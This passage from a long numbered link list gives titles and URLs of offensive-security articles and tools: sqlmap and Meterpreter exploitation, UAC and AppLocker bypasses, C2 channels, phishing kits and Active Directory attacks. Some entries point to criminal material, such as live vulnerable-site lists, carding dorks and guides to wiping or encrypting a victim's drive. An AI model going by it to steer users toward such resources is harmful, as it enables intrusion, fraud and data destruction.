Hacking Part 4: Fetching Payloads via USB Rubber Ducky:\n\n\nhttps://www.hackingloops.com/payloads-via-usb-rubber-ducky/\n\n\n-390-Ethical Hacking Practice Test 6 – Footprinting Fundamentals Level1:\n\n\nhttps://www.hackingloops.com/ethical-hacking-practice-test-6-footprinting-fundamentals-level1/\n\n\n-391-Skip Cracking Responder Hashes and Relay Them:\n\n\nhttps://threat.tevora.com/quick-tip-skip-cracking-responder-hashes-and-replay-them/\n\n\n-392-Cracking NTLMv1 Handshakes with Crack.sh:\n\n\nhttp://threat.tevora.com/quick-tip-crack-ntlmv1-handshakes-with-crack-sh/\n\n\n-393-Top 3 Anti-Forensic OpSec Tips for Linux & A New Dead Man’s Switch:\n\n\nhttps://medium.com/p/d5e92843e64a\n\n\n-394-VNC Penetration Testing (Port 5901):\n\n\nhttp://www.hackingarticles.in/vnc-penetration-testing\n\n\n-395-Windows Privilege Escalation:\n\n\nhttp://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation\n\n\n-396-Removing Sender’s IP Address From Email’s Received: From Header:\n\n\nhttps://www.devside.net/wamp-server/removing-senders-ip-address-from-emails-received-from-header\n\n\n-397-Dump Cleartext Password in Linux PC using MimiPenguin:\n\n\nhttp://www.hackingarticles.in/dump-cleartext-password-linux-pc-using-mimipenguin\n\n\n-398-Embedded Backdoor with Image using FakeImageExploiter:\n\n\nhttp://www.hackingarticles.in/embedded-backdoor-image-using-fakeimageexploiter\n\n\n-399-Exploit Command Injection Vulnearbility with Commix and Netcat:\n\n\nhttp://www.hackingarticles.in/exploit-command-injection-vulnearbility-commix-netcat\n\n\n-400-Exploiting Form Based Sql Injection using Sqlmap:\n\n\nhttp://www.hackingarticles.in/exploiting-form-based-sql-injection-using-sqlmap\n\n\n-401-Beginner Guide to impacket Tool kit:\n\n\nhttp://www.hackingarticles.in/beginner-guide-to-impacket-tool-kit\n\n\n-402-Best of Post Exploitation Exploits & Tricks:\n\n\nhttp://www.hackingarticles.in/best-of-post-exploitation-exploits-tricks\n\n\n-403-Command Injection to Meterpreter using Commix:\n\n\nhttp://www.hackingarticles.in/command-injection-meterpreter-using-commix\n\n\n-404-Comprehensive Guide to Crunch Tool:\n\n\nhttp://www.hackingarticles.in/comprehensive-guide-to-crunch-tool\n\n\n-405-Compressive Guide to File Transfer (Post Exploitation):\n\n\nhttp://www.hackingarticles.in/compressive-guide-to-file-transfer-post-exploitation\n\n\n-406-Crack Wifi Password using Aircrack-Ng (Beginner’s Guide):\n\n\nhttp://www.hackingarticles.in/crack-wifi-password-using-aircrack-ng\n\n\n-407-How to Detect Meterpreter in Your PC:\n\n\nhttp://www.hackingarticles.in/detect-meterpreter-pc\n\n\n-408-Easy way to Hack Database using Wizard switch in Sqlmap:\n\n\nhttp://www.hackingarticles.in/easy-way-hack-database-using-wizard-switch-sqlmap\n\n\n-409-Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn):\n\n\nhttp://www.hackingarticles.in/exploiting-webserver-using-sqlmap-metasploit-os-pwn\n\n\n-410-Create SSL Certified Meterpreter Payload using MPM:\n\n\nhttp://www.hackingarticles.in/exploit-remote-pc-ssl-certified-meterpreter-payload-using-mpm\n\n\n-411-Port forwarding: A practical hands-on guide:\n\n\nhttps://www.abatchy.com/2017/01/port-forwarding-practical-hands-on-guide\n\n\n-412-Exploit Dev 101: Jumping to Shellcode:\n\nhttps://www.abatchy.com/2017/05/jumping-to-shellcode.html\n\n\n-413-Introduction to Manual Backdooring:\n\n\nhttps://www.abatchy.com/2017/05/introduction-to-manual-backdooring_24.html\n\n\n-414-Kernel Exploitation:\n\n\nhttps://www.abatchy.com/2018/01/kernel-exploitation-1\n\n\n-415-Exploit Dev 101: Bypassing ASLR on Windows:\n\n\nhttps://www.abatchy.com/2017/06/exploit-dev-101-bypassing-aslr-on.html\n\n\n-416-Shellcode reduction tips (x86):\n\n\nhttps://www.abatchy.com/2017/04/shellcode-reduction-tips-x86\n\n\n-417-OSCE Study Plan:\n\n\nhttps://www.abatchy.com/2017/03/osce-study-plan\n\n\n-418-[DefCamp CTF Qualification 2017] Don't net, kids! (Revexp 400):\n\n\nhttps://www.abatchy.com/2017/10/defcamp-dotnot\n\n\n-419-DRUPAL 7.X SERVICES MODULE UNSERIALIZE() TO RCE:\n\n\n\nhttps://www.ambionics.io/\n\n\n\n-420-SQL VULNERABLE WEBSITES LIST 2017 [APPROX 2500 FRESH SQL VULNERABLE SITES]:\n\n\n\nhttps://www.cityofhackerz.com/sql-vulnerable-websites-list-2017\n\n\n-421-Windows IR Live Forensics Cheat Sheet:\n\n\nhttps://www.cheatography.com/tag/forensics/\n\n\n-422-windows-kernel-logic-bug-class-access:\n\n\nhttps://googleprojectzero.blogspot.com/2019/03/windows-kernel-logic-bug-class-access.html\n\n\n\n-423-injecting-code-into-windows-protected:\n\n\nhttps://googleprojectzero.blogspot.com/2018/11/injecting-code-into-windows-protected.html\n\n\n-424-USING THE DDE ATTACK WITH POWERSHELL EMPIRE:\n\n\nhttps://1337red.wordpress.com/using-the-dde-attack-with-powershell-empire\n\n\n-425-Automated Derivative Administrator Search:\n\n\nhttps://wald0.com/?p=14\n\n\n-426-A Red Teamer’s Guide to GPOs and OUs:\n\n\nhttps://wald0.com/?p=179\n\n\n-427-Pen Testing and Active Directory, Part VI: The Final Case:\n\n\nhttps://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/\n\n\n-428-Offensive Tools and Techniques:\n\n\nhttps://www.sec.uno/2017/03/01/offensive-tools-and-techniques/\n\n\n-429-Three penetration testing tips to out-hack hackers:\n\n\nhttp://infosechotspot.com/three-penetration-testing-tips-to-out-hack-hackers-betanews/\n\n\n-430-Introducing BloodHound:\n\n\nhttps://wald0.com/?p=68\n\n\n-431-Red + Blue = Purple:\n\n\nhttp://www.blackhillsinfosec.com/?p=5368\n\n\n-432-Active Directory Access Control List – Attacks and Defense – Enterprise Mobility and Security Blog:\n\n\nhttps://blogs.technet.microsoft.com/enterprisemobility/2017/09/18/active-directory-access-control-list-attacks-and-defense/\n\n\n-433-PrivEsc: Unquoted Service Path:\n\n\nhttps://www.gracefulsecurity.com/privesc-unquoted-service-path/\n\n\n-434-PrivEsc: Insecure Service Permissions:\n\n\nhttps://www.gracefulsecurity.com/privesc-insecure-service-permissions/\n\n\n-435-PrivEsc: DLL Hijacking:\n\n\nhttps://www.gracefulsecurity.com/privesc-dll-hijacking/\n\n\n-436-Android Reverse Engineering 101 – Part 1:\n\n\nhttp://www.fasteque.com/android-reverse-engineering-101-part-1/\n\n\n-437-Luckystrike: An Evil Office Document Generator:\n\n\nhttps://www.shellntel.com/blog/2016/9/13/luckystrike-a-database-backed-evil-macro-generator\n\n\n-438-the-number-one-pentesting-tool-youre-not-using:\n\n\nhttps://www.shellntel.com/blog/2016/8/3/the-number-one-pentesting-tool-youre-not-using\n\n\n-439-uac-bypass:\n\n\nhttp://www.securitynewspaper.com/tag/uac-bypass/\n\n\n-440-XSSer – Automated Framework Tool to Detect and Exploit XSS vulnerabilities:\n\n\nhttps://gbhackers.com/xsser-automated-framework-detectexploit-report-xss-vulnerabilities\n\n\n-441-Penetration Testing on X11 Server:\n\n\nhttp://www.hackingarticles.in/penetration-testing-on-x11-server\n\n\n-442-Always Install Elevated:\n\n\nhttps://pentestlab.blog/2017/02/28/always-install-elevated\n\n\n-443-Scanning for Active Directory Privileges & Privileged Accounts:\n\nhttps://adsecurity.org/?p=3658\n\n\n-444-Windows Server 2016 Active Directory Features:\n\n\nhttps://adsecurity.org/?p=3646\n\n\n-445-powershell:\n\n\nhttps://adsecurity.org/?tag=powershell\n\n\n-446-PowerShell Security: PowerShell Attack Tools, Mitigation, & Detection:\n\n\nhttps://adsecurity.org/?p=2921\n\n\n-447-DerbyCon 6 (2016) Talk – Attacking EvilCorp: Anatomy of a Corporate Hack:\n\n\nhttps://adsecurity.org/?p=3214\n\n\n-448-Real-World Example of How Active Directory Can Be Compromised (RSA Conference Presentation):\n\n\nhttps://adsecurity.org/?p=2085\n\n\n-449-Advanced ATM Penetration Testing Methods:\n\n\nhttps://gbhackers.com/advanced-atm-penetration-testing-methods\n\n\n-450-Background: Microsoft Ofice Exploitation:\n\n\nhttps://rhinosecuritylabs.com/research/abusing-microsoft-word-features-phishing-subdoc/\n\n\n-451-Automated XSS Finder:\n\n\nhttps://medium.com/p/4236ed1c6457\n\n\n-452-Application whitelist bypass using XLL and embedded shellcode:\n\n\nhttps://rileykidd.com/.../application-whitelist-bypass-using-XLL-and-embedded-shellc\n\n\n-453-AppLocker Bypass – Regsvr32:\n\n\nhttps://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32\n\n\n\n-454-Nmap Scans using Hex Value of Flags:\n\n\nhttp://www.hackingarticles.in/nmap-scans-using-hex-value-flags\n\n\n-455-Nmap Scan with Timing Parameters:\n\n\nhttp://www.hackingarticles.in/nmap-scan-with-timing-parameters\n\n\n-456-OpenSSH User Enumeration Time- Based Attack with Osueta:\n\n\nhttp://www.hackingarticles.in/openssh-user-enumeration-time-based-attack-osueta\n\n\n-457-Penetration Testing:\n\n\nhttp://www.hackingarticles.in/web-penetration-testing/\n\n\n-458-Penetration Testing on Remote Desktop (Port 3389):\n\n\nhttp://www.hackingarticles.in/penetration-testing-remote-desktop-port-3389\n\n\n-459-Penetration Testing on Telnet (Port 23):\n\n\nhttp://www.hackingarticles.in/penetration-testing-telnet-port-23\n\n\n-460-Penetration Testing in Windows/Active Directory with Crackmapexec:\n\n\nhttp://www.hackingarticles.in/penetration-testing-windowsactive-directory-crackmapexec\n\n\n-461-Penetration Testing in WordPress Website using WordPress Exploit Framework:\n\n\nhttp://www.hackingarticles.in/penetration-testing-wordpress-website-using-wordpress-exploit-framework\n\n\n-462-Port Scanning using Metasploit with IPTables:\n\n\nhttp://www.hackingarticles.in/port-scanning-using-metasploit-iptables\n\n\n-463-Post Exploitation Using WMIC (System Command):\n\n\nhttp://www.hackingarticles.in/post-exploitation-using-wmic-system-command\n\n\n-464-Privilege Escalation in Linux using etc/passwd file:\n\n\n\nhttp://www.hackingarticles.in/privilege-escalation-in-linux-using-etc-passwd-file\n\n\n-465-RDP Pivoting with Metasploit:\n\n\nhttp://www.hackingarticles.in/rdp-pivoting-metasploit\n\n\n-466-A New Way to Hack Remote PC using Xerosploit and Metasploit:\n\n\nhttp://www.hackingarticles.in/new-way-hack-remote-pc-using-xerosploit-metasploit\n\n\n-467-Shell to Meterpreter using Session Command:\n\n\nhttp://www.hackingarticles.in/shell-meterpreter-using-session-command\n\n\n-468-SMTP Pentest Lab Setup in Ubuntu (Port 25):\n\n\nhttp://www.hackingarticles.in/smtp-pentest-lab-setup-ubuntu\n\n\n-469-SNMP Lab Setup and Penetration Testing:\n\n\nhttp://www.hackingarticles.in/snmp-lab-setup-and-penetration-testing\n\n\n-470-SQL Injection Exploitation in Multiple Targets using Sqlmap:\n\n\nhttp://www.hackingarticles.in/sql-injection-exploitation-multiple-targets-using-sqlmap\n\n\n-471-Sql Injection Exploitation with Sqlmap and Burp Suite (Burp CO2 Plugin):\n\n\nhttp://www.hackingarticles.in/sql-injection-exploitation-sqlmap-burp-suite-burp-co2-plugin\n\n\n-472-SSH Penetration Testing (Port 22):\n\n\nhttp://www.hackingarticles.in/ssh-penetration-testing-port-22\n\n\n-473-Manual Post Exploitation on Windows PC (System Command):\n\n\nhttp://www.hackingarticles.in/manual-post-exploitation-windows-pc-system-command\n\n\n-474-SSH Pivoting using Meterpreter:\n\n\nhttp://www.hackingarticles.in/ssh-pivoting-using-meterpreter\n\n\n-475-Stealing Windows Credentials of Remote PC with MS Office Document:\n\n\nhttp://www.hackingarticles.in/stealing-windows-credentials-remote-pc-ms-office-document\n\n\n-476-Telnet Pivoting through Meterpreter:\n\n\nhttp://www.hackingarticles.in/telnet-pivoting-meterpreter\n\n\n-477-Hack Password using Rogue Wi-Fi Access Point Attack (WiFi-Pumpkin):\n\n\nhttp://www.hackingarticles.in/hack-password-using-rogue-wi-fi-access-point-attack-wifi-pumpkin\n\n\n-478-Hack Remote PC using Fake Updates Scam with Ettercap and Metasploit:\n\n\nhttp://www.hackingarticles.in/hack-remote-pc-using-fake-updates-scam-with-ettercap-and-metasploit\n\n\n-479-Hack Remote Windows 10 Password in Plain Text using Wdigest Credential Caching Exploit:\n\n\nhttp://www.hackingarticles.in/hack-remote-windows-10-password-plain-text-using-wdigest-credential-caching-exploit\n\n\n-480-Hack Remote Windows 10 PC using TheFatRat:\n\n\nhttp://www.hackingarticles.in/hack-remote-windows-10-pc-using-thefatrat\n\n\n-481-2 Ways to Hack Windows 10 Password Easy Way:\n\n\nhttp://www.hackingarticles.in/hack-windows-10-password-easy-way\n\n\n-482-How to Change ALL Files Extension in Remote PC (Confuse File Extensions Attack):\n\n\nhttp://www.hackingarticles.in/how-to-change-all-files-extension-in-remote-pc-confuse-file-extensions-attack\n\n\n-483-How to Delete ALL Files in Remote Windows PC:\n\n\nhttp://www.hackingarticles.in/how-to-delete-all-files-in-remote-windows-pc-2\n\n\n-484-How to Encrypt Drive of Remote Victim PC:\n\n\nhttp://www.hackingarticles.in/how-to-encrypt-drive-of-remote-victim-pc\n\n\n-485-Post Exploitation in Linux With Metasploit:\n\n\nhttps://pentestlab.blog/2013/01/04/post-exploitation-in-linux-with-metasploit\n\n\n-486-Red Team:\n\n\nhttps://posts.specterops.io/tagged/red-team?source=post\n\n\n-487-Code Signing Certi cate Cloning Attacks and Defenses:\n\n\nhttps://posts.specterops.io/tagged/code-signing?source=post\n\n\n-488-Phishing:\n\n\nhttps://posts.specterops.io/tagged/phishing?source=post\n\n\n-489-PowerPick – A ClickOnce Adjunct:\n\n\nhttp://www.sixdub.net/?p=555\n\n\n-490-sql-injection-xss-playground:\n\n\nhttps://ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground\n\n\n-491-Privilege Escalation & Post-Exploitation:\n\n\nhttps://github.com/rmusser01/Infosec_Reference/raw/master/Draft/Privilege%20Escalation%20%26%20Post-Exploitation.md\n\n\n-492-https-payload-and-c2-redirectors:\n\n\nhttps://posts.specterops.io/https-payload-and-c2-redirectors-ff8eb6f87742?source=placement_card_footer_grid---------2-41\n\n\n-493-a-push-toward-transparency:\n\n\nhttps://posts.specterops.io/a-push-toward-transparency-c385a0dd1e34?source=placement_card_footer_grid---------0-41\n\n\n-494-bloodhound:\n\n\nhttps://posts.specterops.io/tagged/bloodhound?source=post\n\n\n-495-active directory:\n\n\nhttps://posts.specterops.io/tagged/active-directory?source=post\n\n\n-496-Load & Execute Bundles with migrationTool:\n\n\nhttps://posts.specterops.io/load-execute-bundles-with-migrationtool-f952e276e1a6?source=placement_card_footer_grid---------1-41\n\n\n-497-Outlook Forms and Shells:\n\n\nhttps://sensepost.com/blog/2017/outlook-forms-and-shells/\n\n\n-498-Tools:\n\n\nhttps://sensepost.com/blog/tools/\n\n\n-499-2018 pentesting resources:\n\n\nhttps://sensepost.com/blog/2018/\n\n\n-500-network pentest:\n\n\nhttps://securityonline.info/category/penetration-testing/network-pentest/\n\n\n-501-[technical] Pen-testing resources:\n\n\nhttps://medium.com/p/cd01de9036ad\n\n\n\n-502-Stored XSS on Facebook:\n\n\nhttps://opnsec.com/2018/03/stored-xss-on-facebook/\n\n\n-503-vulnerabilities:\n\n\nhttps://www.brokenbrowser.com/category/vulnerabilities/\n\n\n-504-Extending BloodHound: Track and Visualize Your Compromise:\n\n\nhttps://porterhau5.com/.../extending-bloodhound-track-and-visualize-your-compromise\n\n\n-505-so-you-want-to-be-a-web-security-researcher:\n\n\nhttps://portswigger.net/blog/so-you-want-to-be-a-web-security-researcher\n\n\n-506-BugBounty — AWS S3 added to my “Bucket” list!:\n\n\nhttps://medium.com/p/f68dd7d0d1ce\n\n\n-507-BugBounty — API keys leakage, Source code disclosure in India’s largest e-commerce health care company:\n\n\nhttps://medium.com/p/c75967392c7e\n\n\n-508-BugBounty — Exploiting CRLF Injection can lands into a nice bounty:\n\n\nhttps://medium.com/p/159525a9cb62\n\n\n-509-BugBounty — How I was able to bypass rewall to get RCE and then went from server shell to get root user account:\n\n\nhttps://medium.com/p/783f71131b94\n\n\n-510-BugBounty — “I don’t need your current password to login into youraccount” - How could I completely takeover any user’s account in an online classi ed ads company:\n\n\nhttps://medium.com/p/e51a945b083d\n\n\n-511-Ping Power — ICMP Tunnel:\n\n\nhttps://medium.com/bugbountywriteup/ping-power-icmp-tunnel-31e2abb2aaea?source=placement_card_footer_grid---------1-41\n\n\n-512-hacking:\n\n\nhttps://www.nextleveltricks.com/hacking/\n\n\n-513-Top 8 Best YouTube Channels To Learn Ethical Hacking Online !:\n\n\nhttps://www.nextleveltricks.com/youtube-channels-to-learn-hacking/\n\n\n-514-Google Dorks List 2018 | Fresh Google Dorks 2018 for SQLi:\n\n\nhttps://www.nextleveltricks.com/latest-google-dorks-list/\n\n\n-515-Art of Shellcoding: Basic AES Shellcode Crypter:\n\n\nhttp://www.nipunjaswal.com/2018/02/shellcode-crypter.html\n\n\n-516-Big List Of Google Dorks Hacking:\n\n\nhttps://xspiyr.wordpress.com/2012/09/05/big-list-of-google-dorks-hacking/\n\n\n-517-nmap-cheatsheet:\n\n\nhttps://bitrot.sh/cheatsheet/09-12-2017-nmap-cheatsheet/\n\n\n-518-Aws Recon:\n\n\nhttps://enciphers.com/tag/aws-recon/\n\n\n-519-Recon:\n\nhttps://enciphers.com/tag/recon/\n\n\n-520-Subdomain Enumeration:\n\n\nhttps://enciphers.com/tag/subdomain-enumeration/\n\n\n-521-Shodan:\n\n\nhttps://enciphers.com/tag/shodan/\n\n\n-522-Dump LAPS passwords with ldapsearch:\n\n\nhttps://malicious.link/post/2017/dump-laps-passwords-with-ldapsearch/\n\n\n-523-peepdf - PDF Analysis Tool:\n\n\nhttp://eternal-todo.com/tools/peepdf-pdf-analysis-tool\n\n\n-524-Evilginx 2 - Next Generation of Phishing 2FA Tokens:\n\n\nbreakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokens/\n\n\n-526-Evil XML with two encodings:\n\n\nhttps://mohemiv.com/all/evil-xml/\n\n\n-527-create-word-macros-with-powershell:\n\n\nhttps://4sysops.com/archives/create-word-macros-with-powershell/\n\n\n-528-Excess XSS A comprehensive tutorial on cross-site scripting:\n\n\nhttps://excess-xss.com/\n\n\n\n-529-Executing Commands and Bypassing AppLocker with PowerShell Diagnostic Scripts:\n\n\nhttps://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/\n\n\n-530-Abusing DCOM For Yet Another Lateral Movement Technique:\n\n\nhttps://bohops.com/2018/04/28/abusing-dcom-for-yet-another-lateral-movement-technique/\n\n\n-531-Trust Direction: An Enabler for Active Directory Enumeration and Trust Exploitation:\n\n\n\nhttps://bohops.com/2017/12/02/trust-direction-an-enabler-for-active-directory-enumeration-and-trust-exploitation/\n\n\n\n-532-Abusing DCOM For Yet Another Lateral Movement Technique:\n\n\nhttps://bohops.com/2018/04/28/abusing-dcom-for-yet-another-lateral-movement-technique/\n\n\n-533-“Practical recon techniques for bug hunters & pen testers”:\n\n\nhttps://blog.appsecco.com/practical-recon-techniques-for-bug-hunters-pen-testers-at-levelup-0x02-b72c15641972?source=placement_card_footer_grid---------2-41\n\n\n-534-Exploiting Node.js deserialization bug for Remote Code Execution:\n\n\nhttps://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/\n\n\n-535-Exploiting System Shield AntiVirus Arbitrary Write Vulnerability using SeTakeOwnershipPrivilege:\n\n\nhttp://www.greyhathacker.net/?p=1006\n\n\n-536-Running Macros via ActiveX Controls:\n\n\nhttp://www.greyhathacker.net/?p=948\n\n\n-537-all=BUG+MALWARE+EXPLOITS\n\n\nhttp://www.greyhathacker.net/?cat=18\n\n\n-538-“FILELESS” UAC BYPASS USING EVENTVWR.EXE AND:\n\n\nhttps://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking\n\n\n-539-BYPASSING UAC ON WINDOWS 10 USING DISK CLEANUP:\n\n\nhttps://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/\n\n\n-540-A Look at CVE-2017-8715: Bypassing CVE-2017-0218 using PowerShell Module Manifests:\n\n\nhttps://enigma0x3.net/2017/11/06/a-look-at-cve-2017-8715-bypassing-cve-2017-0218-using-powershell-module-manifests/\n\n\n-541-“FILELESS” UAC BYPASS USING SDCLT.EXE:\n\n\nhttps://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe\n\n\n-542-File Upload XSS:\n\n\nhttps://medium.com/p/83ea55bb9a55\n\n\n-543-Firebase Databases:\n\n\nhttps://medium.com/p/f651a7d49045\n\n\n-544-Safe Red Team Infrastructure:\n\n\nhttps://medium.com/@malcomvetter/safe-red-team-infrastructure-c5d6a0f13fac\n\n\n-545-RED-TEAM:\n\n\nhttps://cybersyndicates.com/tags/red-team/\n\n\n-546-Egressing Bluecoat with Cobaltstike & Let's Encrypt:\n\n\nhttps://www.youtube.com/watch?v=cgwfjCmKQwM\n\n\n-547-Veil-Evasion:\n\n\nhttps://cybersyndicates.com/tags/veil-evasion/\n\n\n-548-Dangerous Virus For Windows Crashes Everything Hack window Using Virus:\n\n\nhttp://thelearninghacking.com/create-virus-hack-windows/\n\n\n-549-Download Google Dorks List 2019:\n\n\nhttps://medium.com/p/323c8067502c\n\n\n-550-Don’t leak sensitive data via security scanning tools:\n\n\nhttps://medium.com/p/7d1f715f0486\n\n\n-551-CRLF Injection Into PHP’s cURL Options:\n\n\nhttps://medium.com/@tomnomnom/crlf-injection-into-phps-curl-options-e2e0d7cfe545?source=placement_card_footer_grid---------0-60\n\n\n-552-Open Redirects & Security Done Right!:\n\n\nhttps://medium.com/@AkshaySharmaUS/open-redirects-security-done-right-e524a3185496?source=placement_card_footer_grid---------2-60\n\n\n-553-DOM XSS – auth.uber.com:\n\n\nhttps://stamone-bug-bounty.blogspot.com/2017/10/dom-xss-auth_14.html\n\n\n-554-PowerPoint and Custom Actions:\n\n\nhttps://cofense.com/powerpoint-and-custom-actions/\n\n\n-555-exploiting-adobe-coldfusion:\n\n\nhttps://codewhitesec.blogspot.com/2018/03/exploiting-adobe-coldfusion.html\n\n\n\n-556-Command and Control – HTTPS:\n\n\nhttps://pentestlab.blog/2017/10/04/command-and-control-https\n\n\n-557-Command and Control – Images:\n\n\nhttps://pentestlab.blog/2018/01/02/command-and-control-images\n\n\n-558-Command and Control – JavaScript:\n\n\nhttps://pentestlab.blog/2018/01/08/command-and-control-javascript\n\n\n-559-XSS-Payloads:\n\n\n\nhttps://github.com/Pgaijin66/XSS-Payloads\n\n\n-560-Command and Control – Web Interface:\n\n\nhttps://pentestlab.blog/2018/01/03/command-and-control-web-interface\n\n\n-561-Command and Control – Website:\n\n\nhttps://pentestlab.blog/2017/11/14/command-and-control-website\n\n\n-562-Command and Control – WebSocket:\n\n\nhttps://pentestlab.blog/2017/12/06/command-and-control-websocket\n\n\n-563-atomic-red-team:\n\n\nhttps://github.com/redcanaryco/atomic-red-team\n\n\n\n-564-PowerView-3.0-tricks.ps1:\n\n\nhttps://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993\n\n\n-565-awesome-sec-talks:\n\n\nhttps://github.com/PaulSec/awesome-sec-talks\n\n\n-566-Awesome-Red-Teaming:\n\n\nhttps://github.com/yeyintminthuhtut/Awesome-Red-Teaming\n\n\n-567-awesome-php:\n\n\nhttps://github.com/ziadoz/awesome-php\n\n\n-568-latest-hacks:\n\n\nhttps://hackercool.com/latest-hacks/\n\n\n-569-GraphQL NoSQL Injection Through JSON Types:\n\n\nhttp://www.east5th.co/blog/2017/06/12/graphql-nosql-injection-through-json-types/\n\n\n-570-Writing .NET Executables for Pentesters:\n\n\nhttps://www.peew.pw/blog/2017/12/4/writing-net-executables-for-penteters-part-2\n\n\n-571-A curated list of fuzzing resources ( Books, courses - free and paid, videos, tools, tutorials and vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Development like root cause analysis.\n\n\nhttps://github.com/secfigo/Awesome-Fuzzing\n\n\n-572-How to Shutdown, Restart, Logoff, and Hibernate Remote Windows PC:\n\n\nhttp://www.hackingarticles.in/how-to-shutdown-restart-logoff-and-hibernate-remote-windows-pc\n\n\n-572-Injecting Metasploit Payloads into Android Applications – Manually:\n\n\nhttps://pentestlab.blog/2017/06/26/injecting-metasploit-payloads-into-android-applications-manually\n\n\n\n-573-Google Dorks For Carding [Huge List] - Part 1:\n\n\nhttps://hacker-arena.blogspot.com/2014/03/google-dorks-for-carding-huge-list-part.html\n\n\n-574-Google dorks for growth hackers:\n\n\nhttps://medium.com/p/7f83c8107057\n\n\n-575-Google Dorks For Carding (HUGE LIST):\n\n\nhttps://leetpedia.blogspot.com/2013/01/google-dorks-for-carding-huge-list.html\n\n\n-576-BIGGEST SQL Injection Dorks List ~ 20K+ Dorks:\n\n\nhttps://leetpedia.blogspot.com/2013/05/biggest-sql-injection-dorks-list-20k.html\n\n\n-577-Pastebin Accounts Hacking (Facebook/Paypal/LR/Gmail/Yahoo, etc):\n\n\nhttps://leetpedia.blogspot.com/2013/01/pastebin-accounts-hacking.html\n\n\n-578-How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!:\n\n\nhttp://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html\n\n\n-579-Hijacking VNC (Enum, Brute, Access and Crack):\n\n\nhttps://medium.com/p/d3d18a4601cc\n\n\n-580-Linux Post Exploitation Command List:\n\n\nhttps://github.com/mubix/post-exploitation/wiki\n\n\n-581-List of google dorks for sql injection:\n\n\nhttps://deadlyhacker.wordpress.com/2013/05/09/list-of-google-dorks-for-sql-injection/\n\n\n-582-Microsoft Office – NTLM Hashes via Frameset:\n\n\nhttps://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset\n\n\n\n-583-Microsoft Windows 10 - Child Process Restriction Mitigation Bypass:\n\n\nhttps://www.exploit-db.com/download/44888.txt\n\n\n-584-Microsoft Windows CVE-2018-8210 Remote Code Execution Vulnerability:\n\n\nhttps://www.securityfocus.com/bid/104407\n\n\n-585-Microsoft Windows Kernel CVE-2018-0982 Local Privilege Escalation Vulnerability:\n\n\nhttps://www.securityfocus.com/bid/104382\n\n\n-586-miSafes Mi-Cam Device Hijacking:\n\n\nhttps://packetstormsecurity.com/files/146504/SA-20180221-0.txt\n\n\n-587-Low-Level Windows API Access From PowerShell:\n\n\n\nhttps://www.fuzzysecurity.com/tutorials/24.html\n\n\n-588-Linux Kernel 'mm/hugetlb.c' Local Denial of Service Vulnerability:\n\n\nhttps://www.securityfocus.com/bid/103316\n\n\n-589-Lateral Movement – RDP:\n\n\nhttps://pentestlab.blog/2018/04/24/lateral-movement-rdp/\n\n\n-590-Snagging creds from locked machines:\n\n\nhttps://malicious.link/post/2016/snagging-creds-from-locked-machines/\n\n\n-591-Making a Blind SQL Injection a Little Less Blind:\n\n\nhttps://medium.com/p/428dcb614ba8\n\n\n-592-VulnHub — Kioptrix: Level 5:\n\n\nhttps://medium.com/@bondo.mike/vulnhub-kioptrix-level-5-88ab65146d48?source=placement_card_footer_grid---------1-60\n\n\n-593-Unauthenticated Account Takeover Through HTTP Leak:\n\n\nhttps://medium.com/p/33386bb0ba0b\n\n\n-594-Hakluke’s Ultimate OSCP Guide: Part 1 — Is OSCP for you?:\n\n\nhttps://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-1-is-oscp-for-you-b57cbcce7440?source=placement_card_footer_grid---------2-43\n\n\n-595-Finding Target-relevant Domain Fronts:\n\n\nhttps://medium.com/@vysec.private/finding-target-relevant-domain-fronts-7f4ad216c223?source=placement_card_footer_grid---------0-44\n\n\n-596-Safe Red Team Infrastructure:\n\n\nhttps://medium.com/@malcomvetter/safe-red-team-infrastructure-c5d6a0f13fac?source=placement_card_footer_grid---------1-60\n\n\n-597-Cobalt Strike Visualizations:\n\n\nhttps://medium.com/@001SPARTaN/cobalt-strike-visualizations-e6a6e841e16b?source=placement_card_footer_grid---------2-60\n\n\n\n-598-OWASP Top 10 2017 — Web Application Security Risks:\n\n\nhttps://medium.com/p/31f356491712\n\n\n-599-XSS-Auditor — the protector of unprotected:\n\n\nhttps://medium.com/bugbountywriteup/xss-auditor-the-protector-of-unprotected-f900a5e15b7b?source=placement_card_footer_grid---------0-60\n\n\n-600-Netcat vs Cryptcat – Remote Shell to Control Kali Linux from Windows machine:\n\n\nhttps://gbhackers.com/netcat-vs-cryptcat\n\n\n-601-Jenkins Servers Infected With Miner.:\n\n\nhttps://medium.com/p/e370a900ab2e\n\n\n-602-cheat-sheet:\n\n\nhttp://pentestmonkey.net/category/cheat-sheet\n\n\n-603-Command and Control – Website Keyword:\n\n\nhttps://pentestlab.blog/2017/09/14/command-and-control-website-keyword/\n\n\n-604-Command and Control – Twitter:\n\n\nhttps://pentestlab.blog/2017/09/26/command-and-control-twitter/\n\n\n-605-Command and Control – Windows COM:\n\n\nhttps://pentestlab.blog/2017/09/01/command-and-control-windows-com/\n\n\n-606-Microsoft Office – NTLM Hashes via Frameset:\n\n\nhttps://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset/\n\n\n-607-PHISHING AGAINST PROTECTED VIEW:\n\n\nhttps://enigma0x3.net/2017/07/13/phishing-against-protected-view/\n\n\n-608-PHISHING WITH EMPIRE:\n\n\nhttps://enigma0x3.net/2016/03/15/phishing-with-empire/\n\n\n-609-Reverse Engineering Android Applications:\n\n\nhttps://pentestlab.blog/2017/02/06/reverse-engineering-android-applications/\n\n\n-610-HTML 